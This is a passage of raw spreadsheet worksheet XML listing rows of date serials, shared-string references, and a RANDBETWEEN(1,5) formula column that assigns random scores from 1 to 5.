      </c>
    </row>
    <row r="14328" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14328" s="1">
        <v>43244.314745370371</v>
      </c>
      <c r="C14328" t="s">
        <v>48</v>
      </c>
      <c r="E14328" t="s">
        <v>12860</v>
      </c>
      <c r="F14328">
        <f t="shared" ca="1" si="223"/>
        <v>5</v>
      </c>
    </row>
    <row r="14329" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A14329" s="1">
        <v>43244.282731481479</v>
      </c>
      <c r="C14329" t="s">
        <v>71</v>
      </c>
      <c r="E14329" s="2" t="s">
        <v>12861</v>
      </c>
      <c r="F14329">
        <f t="shared" ca="1" si="223"/>
        <v>3</v>
      </c>
    </row>
    <row r="14330" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14330" s="1">
        <v>43244.269305555557</v>
      </c>
      <c r="C14330" t="s">
        <v>749</v>
      </c>
      <c r="D14330" t="s">
        <v>494</v>
      </c>
      <c r="E14330" s="2" t="s">
        <v>12862</v>
      </c>
      <c r="F14330">
        <f t="shared" ca="1" si="223"/>
        <v>1</v>
      </c>
    </row>
    <row r="14331" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14331" s="1">
        <v>43244.246192129627</v>
      </c>
      <c r="C14331" t="s">
        <v>48</v>
      </c>
      <c r="E14331" t="s">
        <v>12863</v>
      </c>
      <c r="F14331">
        <f t="shared" ca="1" si="223"/>
        <v>4</v>
      </c>
    </row>
    <row r="14332" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A14332" s="1">
        <v>43244.236631944441</v>
      </c>
      <c r="C14332" t="s">
        <v>10</v>
      </c>
      <c r="D14332" t="s">
        <v>163</v>
      </c>
      <c r="E14332" s="2" t="s">
        <v>12864</v>
      </c>
      <c r="F14332">
        <f t="shared" ca="1" si="223"/>
        <v>2</v>
      </c>
    </row>
    <row r="14333" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14333" s="1">
        <v>43244.225289351853</v>
      </c>
      <c r="C14333" t="s">
        <v>48</v>
      </c>
      <c r="E14333" s="2" t="s">
        <v>12865</v>
      </c>
      <c r="F14333">
        <f t="shared" ca="1" si="223"/>
        <v>2</v>
      </c>
    </row>
    <row r="14334" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A14334" s="1">
        <v>43244.220914351848</v>
      </c>
      <c r="C14334" t="s">
        <v>71</v>
      </c>
      <c r="E14334" s="2" t="s">
        <v>12866</v>
      </c>
      <c r="F14334">
        <f t="shared" ca="1" si="223"/>
        <v>4</v>
      </c>
    </row>
    <row r="14335" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14335" s="1">
        <v>43244.217962962961</v>
      </c>
      <c r="C14335" t="s">
        <v>253</v>
      </c>
      <c r="E14335" t="s">
        <v>12867</v>
      </c>
      <c r="F14335">
        <f t="shared" ca="1" si="223"/>
        <v>2</v>
      </c>
    </row>
    <row r="14336" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A14336" s="1">
        <v>43244.203703703701</v>
      </c>
      <c r="C14336" t="s">
        <v>65</v>
      </c>
      <c r="D14336" t="s">
        <v>312</v>
      </c>
      <c r="E14336" s="2" t="s">
        <v>12868</v>
      </c>
      <c r="F14336">
        <f t="shared" ca="1" si="223"/>
        <v>4</v>
      </c>
    </row>
    <row r="14337" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14337" s="1">
        <v>43244.202789351853</v>
      </c>
      <c r="C14337" t="s">
        <v>845</v>
      </c>
      <c r="D14337" t="s">
        <v>312</v>
      </c>
      <c r="E14337" t="s">
        <v>12869</v>
      </c>
      <c r="F14337">
        <f t="shared" ca="1" si="223"/>
        <v>2</v>
      </c>
    </row>
    <row r="14338" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14338" s="1">
        <v>43244.193136574075</v>
      </c>
      <c r="C14338" t="s">
        <v>71</v>
      </c>
      <c r="E14338" t="s">
        <v>12870</v>
      </c>
      <c r="F14338">
        <f t="shared" ref="F14338:F14401" ca="1" si="224">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="14339" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A14339" s="1">
        <v>43244.190798611111</v>
      </c>
      <c r="C14339" t="s">
        <v>124</v>
      </c>
      <c r="E14339" s="2" t="s">
        <v>12871</v>
      </c>
      <c r="F14339">
        <f t="shared" ca="1" si="224"/>
        <v>3</v>
      </c>
    </row>
    <row r="14340" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A14340" s="1">
        <v>43244.188854166663</v>
      </c>
      <c r="C14340" t="s">
        <v>154</v>
      </c>
      <c r="D14340" t="s">
        <v>41</v>
      </c>
      <c r="E14340" s="2" t="s">
        <v>12872</v>
      </c>
      <c r="F14340">
        <f t="shared" ca="1" si="224"/>
        <v>5</v>
      </c>
    </row>
    <row r="14341" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A14341" s="1">
        <v>43244.179918981485</v>
      </c>
      <c r="C14341" t="s">
        <v>73</v>
      </c>
      <c r="E14341" s="2" t="s">
        <v>12873</v>
      </c>
      <c r="F14341">
        <f t="shared" ca="1" si="224"/>
        <v>3</v>
      </c>
    </row>
    <row r="14342" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A14342" s="1">
        <v>43244.177835648145</v>
      </c>
      <c r="C14342" t="s">
        <v>71</v>
      </c>
      <c r="E14342" s="2" t="s">
        <v>12874</v>
      </c>
      <c r="F14342">
        <f t="shared" ca="1" si="224"/>
        <v>5</v>
      </c>
    </row>
    <row r="14343" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14343" s="1">
        <v>43244.157812500001</v>
      </c>
      <c r="C14343" t="s">
        <v>65</v>
      </c>
      <c r="E14343" s="2" t="s">
        <v>12875</v>
      </c>
      <c r="F14343">
        <f t="shared" ca="1" si="224"/>
        <v>2</v>
      </c>
    </row>
    <row r="14344" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14344" s="1">
        <v>43244.138310185182</v>
      </c>
      <c r="C14344" t="s">
        <v>430</v>
      </c>
      <c r="E14344" s="2" t="s">
        <v>12876</v>
      </c>
      <c r="F14344">
        <f t="shared" ca="1" si="224"/>
        <v>5</v>
      </c>
    </row>
    <row r="14345" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A14345" s="1">
        <v>43244.1252662037</v>
      </c>
      <c r="C14345" t="s">
        <v>140</v>
      </c>
      <c r="D14345" t="s">
        <v>847</v>
      </c>
      <c r="E14345" s="2" t="s">
        <v>12877</v>
      </c>
      <c r="F14345">
        <f t="shared" ca="1" si="224"/>
        <v>3</v>
      </c>
    </row>
    <row r="14346" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A14346" s="1">
        <v>43244.082604166666</v>
      </c>
      <c r="C14346" t="s">
        <v>154</v>
      </c>
      <c r="D14346" t="s">
        <v>89</v>
      </c>
      <c r="E14346" s="2" t="s">
        <v>12878</v>
      </c>
      <c r="F14346">
        <f t="shared" ca="1" si="224"/>
        <v>2</v>
      </c>
    </row>
    <row r="14347" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14347" s="1">
        <v>43244.015046296299</v>
      </c>
      <c r="C14347" t="s">
        <v>845</v>
      </c>
      <c r="F14347">
        <f t="shared" ca="1" si="224"/>
        <v>3</v>
      </c>
    </row>
    <row r="14348" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A14348" s="1">
        <v>43243.975266203706</v>
      </c>
      <c r="C14348" t="s">
        <v>6</v>
      </c>
      <c r="D14348" t="s">
        <v>25</v>
      </c>
      <c r="E14348" s="2" t="s">
        <v>12879</v>
      </c>
      <c r="F14348">
        <f t="shared" ca="1" si="224"/>
        <v>2</v>
      </c>
    </row>
    <row r="14349" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14349" s="1">
        <v>43243.960717592592</v>
      </c>
      <c r="C14349" t="s">
        <v>253</v>
      </c>
      <c r="D14349" t="s">
        <v>312</v>
      </c>
      <c r="E14349" t="s">
        <v>12880</v>
      </c>
      <c r="F14349">
        <f t="shared" ca="1" si="224"/>
        <v>1</v>
      </c>
    </row>
    <row r="14350" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14350" s="1">
        <v>43243.904166666667</v>
      </c>
      <c r="C14350" t="s">
        <v>410</v>
      </c>
      <c r="E14350" s="2" t="s">
        <v>12881</v>
      </c>
      <c r="F14350">
        <f t="shared" ca="1" si="224"/>
        <v>5</v>
      </c>
    </row>
    <row r="14351" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14351" s="1">
        <v>43243.748020833336</v>
      </c>
      <c r="C14351" t="s">
        <v>10</v>
      </c>
      <c r="D14351" t="s">
        <v>251</v>
      </c>
      <c r="E14351" t="s">
        <v>12882</v>
      </c>
      <c r="F14351">
        <f t="shared" ca="1" si="224"/>
        <v>4</v>
      </c>
    </row>
    <row r="14352" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14352" s="1">
        <v>43243.743449074071</v>
      </c>
      <c r="C14352" t="s">
        <v>10</v>
      </c>
      <c r="D14352" t="s">
        <v>20</v>
      </c>
      <c r="E14352" t="s">
        <v>12883</v>
      </c>
      <c r="F14352">
        <f t="shared" ca="1" si="224"/>
        <v>3</v>
      </c>
    </row>
    <row r="14353" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14353" s="1">
        <v>43243.740034722221</v>
      </c>
      <c r="C14353" t="s">
        <v>10</v>
      </c>
      <c r="D14353" t="s">
        <v>163</v>
      </c>
      <c r="E14353" s="2" t="s">
        <v>12884</v>
      </c>
      <c r="F14353">
        <f t="shared" ca="1" si="224"/>
        <v>3</v>
      </c>
    </row>
    <row r="14354" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A14354" s="1">
        <v>43243.677708333336</v>
      </c>
      <c r="C14354" t="s">
        <v>10</v>
      </c>
      <c r="D14354" t="s">
        <v>41</v>
      </c>
      <c r="E14354" s="2" t="s">
        <v>12885</v>
      </c>
      <c r="F14354">
        <f t="shared" ca="1" si="224"/>
        <v>3</v>
      </c>
    </row>
    <row r="14355" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14355" s="1">
        <v>43243.675613425927</v>
      </c>
      <c r="C14355" t="s">
        <v>10</v>
      </c>
      <c r="D14355" t="s">
        <v>107</v>
      </c>
      <c r="E14355" t="s">
        <v>12886</v>
      </c>
      <c r="F14355">
        <f t="shared" ca="1" si="224"/>
        <v>1</v>
      </c>
    </row>
    <row r="14356" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14356" s="1">
        <v>43243.667222222219</v>
      </c>
      <c r="C14356" t="s">
        <v>10</v>
      </c>
      <c r="D14356" t="s">
        <v>86</v>
      </c>
      <c r="E14356" t="s">
        <v>12887</v>
      </c>
      <c r="F14356">
        <f t="shared" ca="1" si="224"/>
        <v>3</v>
      </c>
    </row>
    <row r="14357" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A14357" s="1">
        <v>43243.626863425925</v>
      </c>
      <c r="C14357" t="s">
        <v>10</v>
      </c>
      <c r="D14357" t="s">
        <v>33</v>
      </c>
      <c r="E14357" s="2" t="s">
        <v>12888</v>
      </c>
      <c r="F14357">
        <f t="shared" ca="1" si="224"/>
        <v>3</v>
      </c>
    </row>
    <row r="14358" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14358" s="1">
        <v>43243.615370370368</v>
      </c>
      <c r="C14358" t="s">
        <v>10</v>
      </c>
      <c r="D14358" t="s">
        <v>92</v>
      </c>
      <c r="E14358" t="s">
        <v>12889</v>
      </c>
      <c r="F14358">
        <f t="shared" ca="1" si="224"/>
        <v>3</v>
      </c>
    </row>
    <row r="14359" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14359" s="1">
        <v>43243.610127314816</v>
      </c>
      <c r="C14359" t="s">
        <v>10</v>
      </c>
      <c r="D14359" t="s">
        <v>107</v>
      </c>
      <c r="E14359" t="s">
        <v>12890</v>
      </c>
      <c r="F14359">
        <f t="shared" ca="1" si="224"/>
        <v>5</v>
      </c>
    </row>
    <row r="14360" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14360" s="1">
        <v>43243.599664351852</v>
      </c>
      <c r="C14360" t="s">
        <v>71</v>
      </c>
      <c r="E14360" s="2" t="s">
        <v>12891</v>
      </c>
      <c r="F14360">
        <f t="shared" ca="1" si="224"/>
        <v>2</v>
      </c>
    </row>
    <row r="14361" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14361" s="1">
        <v>43243.599374999998</v>
      </c>
      <c r="C14361" t="s">
        <v>71</v>
      </c>
      <c r="E14361" s="2" t="s">
        <v>12891</v>
      </c>
      <c r="F14361">
        <f t="shared" ca="1" si="224"/>
        <v>2</v>
      </c>
    </row>
    <row r="14362" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14362" s="1">
        <v>43243.579988425925</v>
      </c>
      <c r="C14362" t="s">
        <v>454</v>
      </c>
      <c r="D14362" t="s">
        <v>1056</v>
      </c>
      <c r="E14362" s="2" t="s">
        <v>12892</v>
      </c>
      <c r="F14362">
        <f t="shared" ca="1" si="224"/>
        <v>5</v>
      </c>
    </row>
    <row r="14363" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14363" s="1">
        <v>43243.578773148147</v>
      </c>
      <c r="C14363" t="s">
        <v>10</v>
      </c>
      <c r="D14363" t="s">
        <v>667</v>
      </c>
      <c r="E14363" t="s">
        <v>12893</v>
      </c>
      <c r="F14363">
        <f t="shared" ca="1" si="224"/>
        <v>5</v>
      </c>
    </row>
    <row r="14364" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A14364" s="1">
        <v>43243.545428240737</v>
      </c>
      <c r="C14364" t="s">
        <v>10</v>
      </c>
      <c r="D14364" t="s">
        <v>178</v>
      </c>
      <c r="E14364" s="2" t="s">
        <v>12894</v>
      </c>
      <c r="F14364">
        <f t="shared" ca="1" si="224"/>
        <v>1</v>
      </c>
    </row>
    <row r="14365" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14365" s="1">
        <v>43243.485543981478</v>
      </c>
      <c r="C14365" t="s">
        <v>10</v>
      </c>
      <c r="D14365" t="s">
        <v>244</v>
      </c>
      <c r="E14365" t="s">
        <v>12895</v>
      </c>
      <c r="F14365">
        <f t="shared" ca="1" si="224"/>
        <v>5</v>
      </c>
    </row>
    <row r="14366" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14366" s="1">
        <v>43243.469351851854</v>
      </c>
      <c r="C14366" t="s">
        <v>10</v>
      </c>
      <c r="D14366" t="s">
        <v>494</v>
      </c>
      <c r="E14366" t="s">
        <v>12896</v>
      </c>
      <c r="F14366">
        <f t="shared" ca="1" si="224"/>
        <v>4</v>
      </c>
    </row>
    <row r="14367" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14367" s="1">
        <v>43243.446342592593</v>
      </c>
      <c r="C14367" t="s">
        <v>10</v>
      </c>
      <c r="D14367" t="s">
        <v>244</v>
      </c>
      <c r="E14367" t="s">
        <v>12897</v>
      </c>
      <c r="F14367">
        <f t="shared" ca="1" si="224"/>
        <v>3</v>
      </c>
    </row>
    <row r="14368" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14368" s="1">
        <v>43243.443553240744</v>
      </c>
      <c r="C14368" t="s">
        <v>10</v>
      </c>
      <c r="D14368" t="s">
        <v>494</v>
      </c>
      <c r="E14368" t="s">
        <v>12898</v>
      </c>
      <c r="F14368">
        <f t="shared" ca="1" si="224"/>
        <v>4</v>
      </c>
    </row>
    <row r="14369" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14369" s="1">
        <v>43243.433738425927</v>
      </c>
      <c r="C14369" t="s">
        <v>65</v>
      </c>
      <c r="E14369" s="2" t="s">
        <v>12899</v>
      </c>
      <c r="F14369">
        <f t="shared" ca="1" si="224"/>
        <v>2</v>
      </c>
    </row>
    <row r="14370" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14370" s="1">
        <v>43243.427777777775</v>
      </c>
      <c r="C14370" t="s">
        <v>10</v>
      </c>
      <c r="D14370" t="s">
        <v>163</v>
      </c>
      <c r="E14370" t="s">
        <v>12900</v>
      </c>
      <c r="F14370">
        <f t="shared" ca="1" si="224"/>
        <v>3</v>
      </c>
    </row>
    <row r="14371" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14371" s="1">
        <v>43243.411134259259</v>
      </c>
      <c r="C14371" t="s">
        <v>173</v>
      </c>
      <c r="E14371" t="s">
        <v>12901</v>
      </c>
      <c r="F14371">
        <f t="shared" ca="1" si="224"/>
        <v>1</v>
      </c>
    </row>
    <row r="14372" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14372" s="1">
        <v>43243.407986111109</v>
      </c>
      <c r="C14372" t="s">
        <v>71</v>
      </c>
      <c r="E14372" s="2" t="s">
        <v>12902</v>
      </c>
      <c r="F14372">
        <f t="shared" ca="1" si="224"/>
        <v>2</v>
      </c>
    </row>
    <row r="14373" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14373" s="1">
        <v>43243.407256944447</v>
      </c>
      <c r="C14373" t="s">
        <v>6</v>
      </c>
      <c r="D14373" t="s">
        <v>124</v>
      </c>
      <c r="E14373" t="s">
        <v>12903</v>
      </c>
      <c r="F14373">
        <f t="shared" ca="1" si="224"/>
        <v>4</v>
      </c>
    </row>
    <row r="14374" spans="1:6" ht="285" x14ac:dyDescent="0.25">
      <c r="A14374" s="1">
        <v>43243.361400462964</v>
      </c>
      <c r="C14374" t="s">
        <v>48</v>
      </c>
      <c r="E14374" s="2" t="s">
        <v>12904</v>
      </c>
      <c r="F14374">
        <f t="shared" ca="1" si="224"/>
        <v>5</v>
      </c>
    </row>
    <row r="14375" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14375" s="1">
        <v>43243.346400462964</v>
      </c>
      <c r="C14375" t="s">
        <v>10</v>
      </c>
      <c r="D14375" t="s">
        <v>41</v>
      </c>
      <c r="E14375" t="s">
        <v>12905</v>
      </c>
      <c r="F14375">
        <f t="shared" ca="1" si="224"/>
        <v>1</v>
      </c>
    </row>
    <row r="14376" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14376" s="1">
        <v>43243.333622685182</v>
      </c>
      <c r="C14376" t="s">
        <v>197</v>
      </c>
      <c r="E14376" t="s">
        <v>12906</v>
      </c>
      <c r="F14376">
        <f t="shared" ca="1" si="224"/>
        <v>3</v>
      </c>
    </row>
    <row r="14377" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14377" s="1">
        <v>43243.332962962966</v>
      </c>
      <c r="C14377" t="s">
        <v>41</v>
      </c>
      <c r="E14377" s="2" t="s">
        <v>12907</v>
      </c>
      <c r="F14377">
        <f t="shared" ca="1" si="224"/>
        <v>5</v>
      </c>
    </row>
    <row r="14378" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14378" s="1">
        <v>43243.317164351851</v>
      </c>
      <c r="C14378" t="s">
        <v>724</v>
      </c>
      <c r="E14378" s="2" t="s">
        <v>12908</v>
      </c>
      <c r="F14378">
        <f t="shared" ca="1" si="224"/>
        <v>2</v>
      </c>
    </row>
    <row r="14379" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14379" s="1">
        <v>43243.306087962963</v>
      </c>
      <c r="C14379" t="s">
        <v>60</v>
      </c>
      <c r="E14379" s="2" t="s">
        <v>12909</v>
      </c>
      <c r="F14379">
        <f t="shared" ca="1" si="224"/>
        <v>2</v>
      </c>
    </row>
    <row r="14380" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14380" s="1">
        <v>43243.273506944446</v>
      </c>
      <c r="C14380" t="s">
        <v>749</v>
      </c>
      <c r="D14380" t="s">
        <v>94</v>
      </c>
      <c r="E14380" s="2" t="s">
        <v>12910</v>
      </c>
      <c r="F14380">
        <f t="shared" ca="1" si="224"/>
        <v>1</v>
      </c>
    </row>
    <row r="14381" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14381" s="1">
        <v>43243.267847222225</v>
      </c>
      <c r="C14381" t="s">
        <v>41</v>
      </c>
      <c r="E14381" s="2" t="s">
        <v>12911</v>
      </c>
      <c r="F14381">
        <f t="shared" ca="1" si="224"/>
        <v>4</v>
      </c>
    </row>
    <row r="14382" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A14382" s="1">
        <v>43243.242858796293</v>
      </c>
      <c r="C14382" t="s">
        <v>71</v>
      </c>
      <c r="E14382" s="2" t="s">
        <v>12912</v>
      </c>
      <c r="F14382">
        <f t="shared" ca="1" si="224"/>
        <v>1</v>
      </c>
    </row>
    <row r="14383" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14383" s="1">
        <v>43243.221747685187</v>
      </c>
      <c r="C14383" t="s">
        <v>65</v>
      </c>
      <c r="E14383" s="2" t="s">
        <v>12913</v>
      </c>
      <c r="F14383">
        <f t="shared" ca="1" si="224"/>
        <v>3</v>
      </c>
    </row>
    <row r="14384" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14384" s="1">
        <v>43243.216238425928</v>
      </c>
      <c r="C14384" t="s">
        <v>43</v>
      </c>
      <c r="E14384" t="s">
        <v>12914</v>
      </c>
      <c r="F14384">
        <f t="shared" ca="1" si="224"/>
        <v>1</v>
      </c>
    </row>
    <row r="14385" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A14385" s="1">
        <v>43243.209328703706</v>
      </c>
      <c r="C14385" t="s">
        <v>430</v>
      </c>
      <c r="E14385" s="2" t="s">
        <v>12915</v>
      </c>
      <c r="F14385">
        <f t="shared" ca="1" si="224"/>
        <v>1</v>
      </c>
    </row>
    <row r="14386" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14386" s="1">
        <v>43243.193553240744</v>
      </c>
      <c r="C14386" t="s">
        <v>73</v>
      </c>
      <c r="E14386" t="s">
        <v>12916</v>
      </c>
      <c r="F14386">
        <f t="shared" ca="1" si="224"/>
        <v>5</v>
      </c>
    </row>
    <row r="14387" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14387" s="1">
        <v>43243.181157407409</v>
      </c>
      <c r="C14387" t="s">
        <v>48</v>
      </c>
      <c r="E14387" t="s">
        <v>12917</v>
      </c>
      <c r="F14387">
        <f t="shared" ca="1" si="224"/>
        <v>3</v>
      </c>
    </row>
    <row r="14388" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14388" s="1">
        <v>43243.172361111108</v>
      </c>
      <c r="C14388" t="s">
        <v>60</v>
      </c>
      <c r="E14388" t="s">
        <v>12918</v>
      </c>
      <c r="F14388">
        <f t="shared" ca="1" si="224"/>
        <v>3</v>
      </c>
    </row>
    <row r="14389" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14389" s="1">
        <v>43243.162245370368</v>
      </c>
      <c r="C14389" t="s">
        <v>41</v>
      </c>
      <c r="E14389" t="s">
        <v>12919</v>
      </c>
      <c r="F14389">
        <f t="shared" ca="1" si="224"/>
        <v>4</v>
      </c>
    </row>
    <row r="14390" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14390" s="1">
        <v>43243.16134259259</v>
      </c>
      <c r="C14390" t="s">
        <v>139</v>
      </c>
      <c r="E14390" t="s">
        <v>12920</v>
      </c>
      <c r="F14390">
        <f t="shared" ca="1" si="224"/>
        <v>4</v>
      </c>
    </row>
    <row r="14391" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14391" s="1">
        <v>43243.032870370371</v>
      </c>
      <c r="C14391" t="s">
        <v>41</v>
      </c>
      <c r="E14391" t="s">
        <v>12921</v>
      </c>
      <c r="F14391">
        <f t="shared" ca="1" si="224"/>
        <v>4</v>
      </c>
    </row>
    <row r="14392" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A14392" s="1">
        <v>43243.025555555556</v>
      </c>
      <c r="C14392" t="s">
        <v>140</v>
      </c>
      <c r="D14392" t="s">
        <v>234</v>
      </c>
      <c r="E14392" s="2" t="s">
        <v>12922</v>
      </c>
      <c r="F14392">
        <f t="shared" ca="1" si="224"/>
        <v>2</v>
      </c>
    </row>
    <row r="14393" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14393" s="1">
        <v>43243.020127314812</v>
      </c>
      <c r="C14393" t="s">
        <v>9609</v>
      </c>
      <c r="D14393" t="s">
        <v>1091</v>
      </c>
      <c r="E14393" s="2" t="s">
        <v>12923</v>
      </c>
      <c r="F14393">
        <f t="shared" ca="1" si="224"/>
        <v>4</v>
      </c>
    </row>
    <row r="14394" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A14394" s="1">
        <v>43243.017997685187</v>
      </c>
      <c r="C14394" t="s">
        <v>10</v>
      </c>
      <c r="D14394" t="s">
        <v>17</v>
      </c>
      <c r="E14394" s="2" t="s">
        <v>12924</v>
      </c>
      <c r="F14394">
        <f t="shared" ca="1" si="224"/>
        <v>2</v>
      </c>
    </row>
    <row r="14395" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14395" s="1">
        <v>43242.848668981482</v>
      </c>
      <c r="C14395" t="s">
        <v>140</v>
      </c>
      <c r="D14395" t="s">
        <v>141</v>
      </c>
      <c r="E14395" s="2" t="s">
        <v>12925</v>
      </c>
      <c r="F14395">
        <f t="shared" ca="1" si="224"/>
        <v>2</v>
      </c>
    </row>
    <row r="14396" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14396" s="1">
        <v>43242.800509259258</v>
      </c>
      <c r="C14396" t="s">
        <v>222</v>
      </c>
      <c r="E14396" t="s">
        <v>12926</v>
      </c>
      <c r="F14396">
        <f t="shared" ca="1" si="224"/>
        <v>2</v>
      </c>
    </row>
    <row r="14397" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14397" s="1">
        <v>43242.780416666668</v>
      </c>
      <c r="C14397" t="s">
        <v>10</v>
      </c>
      <c r="D14397" t="s">
        <v>112</v>
      </c>
      <c r="E14397" s="2" t="s">
        <v>12927</v>
      </c>
      <c r="F14397">
        <f t="shared" ca="1" si="224"/>
        <v>4</v>
      </c>
    </row>
    <row r="14398" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14398" s="1">
        <v>43242.745648148149</v>
      </c>
      <c r="C14398" t="s">
        <v>749</v>
      </c>
      <c r="D14398" t="s">
        <v>25</v>
      </c>
      <c r="E14398" s="2" t="s">
        <v>12928</v>
      </c>
      <c r="F14398">
        <f t="shared" ca="1" si="224"/>
        <v>5</v>
      </c>
    </row>
    <row r="14399" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14399" s="1">
        <v>43242.715914351851</v>
      </c>
      <c r="C14399" t="s">
        <v>10</v>
      </c>
      <c r="D14399" t="s">
        <v>80</v>
      </c>
      <c r="E14399" t="s">
        <v>12929</v>
      </c>
      <c r="F14399">
        <f t="shared" ca="1" si="224"/>
        <v>2</v>
      </c>
    </row>
    <row r="14400" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14400" s="1">
        <v>43242.694039351853</v>
      </c>
      <c r="C14400" t="s">
        <v>10</v>
      </c>
      <c r="D14400" t="s">
        <v>271</v>
      </c>
      <c r="E14400" t="s">
        <v>12930</v>
      </c>
      <c r="F14400">
        <f t="shared" ca="1" si="224"/>
        <v>3</v>
      </c>
    </row>
    <row r="14401" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14401" s="1">
        <v>43242.677418981482</v>
      </c>
      <c r="C14401" t="s">
        <v>16</v>
      </c>
      <c r="E14401" t="s">
        <v>12931</v>
      </c>
      <c r="F14401">
        <f t="shared" ca="1" si="224"/>
        <v>5</v>
      </c>
    </row>
    <row r="14402" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A14402" s="1">
        <v>43242.672442129631</v>
      </c>
      <c r="C14402" t="s">
        <v>65</v>
      </c>
      <c r="D14402" t="s">
        <v>290</v>
      </c>
      <c r="E14402" s="2" t="s">
        <v>12932</v>
      </c>
      <c r="F14402">
        <f t="shared" ref="F14402:F14465" ca="1" si="225">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="14403" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14403" s="1">
        <v>43242.670312499999</v>
      </c>
      <c r="C14403" t="s">
        <v>10</v>
      </c>
      <c r="D14403" t="s">
        <v>6</v>
      </c>
      <c r="E14403" t="s">
        <v>12933</v>
      </c>
      <c r="F14403">
        <f t="shared" ca="1" si="225"/>
        <v>2</v>
      </c>
    </row>
    <row r="14404" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A14404" s="1">
        <v>43242.661076388889</v>
      </c>
      <c r="C14404" t="s">
        <v>749</v>
      </c>
      <c r="D14404" t="s">
        <v>1036</v>
      </c>
      <c r="E14404" s="2" t="s">
        <v>12934</v>
      </c>
      <c r="F14404">
        <f t="shared" ca="1" si="225"/>
        <v>2</v>
      </c>
    </row>
    <row r="14405" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14405" s="1">
        <v>43242.634131944447</v>
      </c>
      <c r="C14405" t="s">
        <v>6</v>
      </c>
      <c r="D14405" t="s">
        <v>25</v>
      </c>
      <c r="E14405" t="s">
        <v>12935</v>
      </c>
      <c r="F14405">
        <f t="shared" ca="1" si="225"/>
        <v>5</v>
      </c>
    </row>
    <row r="14406" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A14406" s="1">
        <v>43242.625150462962</v>
      </c>
      <c r="C14406" t="s">
        <v>10</v>
